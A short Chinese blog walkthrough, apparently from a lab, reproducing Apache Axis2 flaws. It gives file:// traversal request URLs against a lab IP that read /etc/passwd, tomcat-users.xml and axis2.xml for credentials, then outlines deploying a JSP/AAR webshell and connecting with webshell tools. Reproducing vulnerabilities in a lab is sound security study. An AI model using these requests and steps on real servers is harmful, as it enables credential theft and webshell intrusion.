zoukankan      html  css  js  c++  java
  • Apache Axis2 漏洞复现

    Axis2是Apache Foundation的一个项目,它允许开发人员用CJava创建Web服务。

    默认情况下,Axis2部署在/axis2/(当开发人员使用时axis2.war

    漏洞利用

    遍历漏洞

    1、访问axis路径下

    2访问http://192.168.227.140/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml

    http://192.168.227.140/axis2/services/ProxyService/get?uri=file:///etc/passwd等敏感路径找到tomcat登录账号密码

    3、猜解tomcat管理路径(/tomcat/html),并部署war包(jsp),使其成功解析,并访问根目录(IP/shell/shell.jsp)

    4.成功使用菜刀或冰蟹连接

     二、检索Axis2配置以获取登录凭据

    1、axis2配置文件axis2.xml具有默认位置:/var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml(http://192.168.227.140/axis2/services/ProxyService/get?uri=file:////var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml)

    利用遍历漏洞检索axis2的账号密码

     2、访问axis2的管理页面

    使用账号密码登录,部署war包

    此处需要部署aar包,上传后被成功解析

  • 相关阅读:
    2019年春季学期第三周作业
    2019春第二周作业+一些的挑战作业
    查找整数
    寒假作业3编辑总结
    寒假作业2编辑总结
    对自己影响最大的老师
    2019春第九周作业
    2019春第八周作业
    2019春第七周作业
    2019春第六周作业
  • 原文地址:https://www.cnblogs.com/Shepherd-boy/p/14134035.html
Copyright © 2011-2022 走看看